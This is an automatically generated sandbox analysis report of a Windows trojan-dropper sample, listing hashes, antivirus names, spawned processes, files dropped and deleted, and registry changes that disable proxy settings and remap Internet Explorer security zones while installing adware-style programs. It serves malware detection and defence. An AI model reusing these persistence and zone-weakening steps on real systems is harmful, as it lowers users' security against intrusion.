Trojan-Dropper.Win32.Agent.bjapvx (Kaspersky), Gen:Variant.Adware.MPlug.51 (B) (Emsisoft), Gen:Variant.Adware.MPlug.51 (AdAware), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Dropper, Trojan, Backdoor, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 52eea08e054915129f2638d8012a38f6
SHA1: 2f798b0d3b656556e4d8932e7d0e2251ae541429
SHA256: 1c12146ea5115bb93a53344ebbdbe69ef42eff99e6e97c7eb39f29786d1c122a
SSDeep: 6144:HOMWpa2kA0PIfIyF7D1eUuKg6EizR3iT7:HloX8IfIW1eUh9ESsP
Size: 234496 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-10-25 08:28:59
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1304
%original file name%.exe:996
%original file name%.exe:592
%original file name%.exe:1936
%original file name%.exe:440
NybbleCrawler.xyz.exe:356
rundll32.exe:1256
regsvr32.exe:2008
regsvr32.exe:1784
hpds_setup.exe:164
The Trojan injects its code into the following process(es):
rundll32.exe:1016
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:1304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_4.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_3.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\8[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\progressbar.gif (15 bytes)
%WinDir%\Tasks\Bidaily Synchronize Task[973b].job (450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_5.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_1_3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_3_1[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\%original file name%.exe (8816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4_3[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_1_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3_1.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Desktop\52eea08e054915129f2638d8012a38f6.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\3.ini.txt (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_1_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_2.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_1[1].txt (392 bytes)
%Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\%original file name%.exe (8816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\bg.ca.part (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7_3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(2).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\3.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7.ini.txt (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1_4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\5.ini.tmp (14 bytes)
%Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\52eea08e054915129f2638d8012a38f6.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_5[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2_1.ini.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6.ini.tmp (1184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(4).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\4_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_3.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\8.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\5[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\NybbleCrawler.xyz.exe (27635 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(3).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\4_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_2_1[1].txt (4 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1_4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_3_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_1.ini (0 bytes)
%Documents and Settings%\%current user%\Desktop\52eea08e054915129f2638d8012a38f6.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\5.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\8.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_5.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_2_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_1_1.ini (0 bytes)
The process %original file name%.exe:996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\loader.gif (2 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dll (6693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\820cb716dd7864a479458114e3582eab.ini (514 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.tlb (13 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dat (42 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\dB1XJloRgbF4Qw[1].ca (133377 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3b805d70\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5\temp.ca.part (119356 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3b805d70\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5\temp.ca (0 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3b805d70 (0 bytes)
The process %original file name%.exe:592 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\g7CyPVZagCsRV8[1].ca (134158 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.tlb (13 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe (3572 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dll (6693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0284a4af\temp.ca.part (153797 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dat (44 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\e605d3cdf72e06d079458114e3582eab.ini (512 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0284a4af\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2 (0 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0284a4af (0 bytes)
The process %original file name%.exe:1936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\loader.gif (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\9b4263a9124509d379458114e3582eab.ini (297 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
%Program Files%\CutaThePrice\CutaThePrice.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0903733f\temp.ca.part (24208 bytes)
%Program Files%\CutaThePrice\CutaThePrice.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1829a50e\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\hVwDePRrG2aSqC[1].ca (35544 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\0903733f (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1829a50e\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0903733f\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1829a50e (0 bytes)
The process %original file name%.exe:440 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\fyBYRfMAYKA66R[1].ca (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2e71167f\temp.ca.part (6 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\bab831a24b139eab79458114e3582eab.ini (328 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\loader.gif (2 bytes)
%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1993275e\temp.ca.part (29136 bytes)
%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\progressbar.gif (15 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1993275e (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2e71167f\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2e71167f (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1993275e\temp.ca (0 bytes)
The process NybbleCrawler.xyz.exe:356 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\TerminusKeeper\TerminusKeeper.dll (189078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf071a6d8c.dll (20506 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tf071a6d8c.dll (0 bytes)
Registry activity
The process %original file name%.exe:1304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\FLAGS]
"(Default)" = "0"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\HELPDIR]
"(Default)" = "c:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0]
"(Default)" = "JSIELib"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\79458114e3582eab]
"(Default)" = "inFHyxdfrqw4GcBCDWIpJp8qt5Hd57Gs5m8wkosDKDXTr426U5La6BI6Dq7kK2DlONq2NazNPHYy9pelh2ZT"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "c:\%original file name%.exe"
[HKLM\SOFTWARE\alpha_installer]
"rc" = "1"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}]
"(Default)" = "ITinyJSObject"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\alpha_installer]
"fi" = "0"
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"GlobalMaxTcpWindowSize" = "16777215"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\alpha_installer]
"du" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\alpha_installer]
"cr" = "13080200161088"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "c:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 EB 36 33 B2 53 8D 6A DF 46 E6 1E 29 46 1D 87"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"(Default)" = "{157B1AA6-3E5C-404A-9118-C1D91F537040}"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "c:\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"UninstallString" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoModify" = "1"
"NoRepair" = "1"
"ProductName" = "bestadblocker"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"DisplayName" = "bestadblocker"
"DisplayIcon" = "%System%\msiexec.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
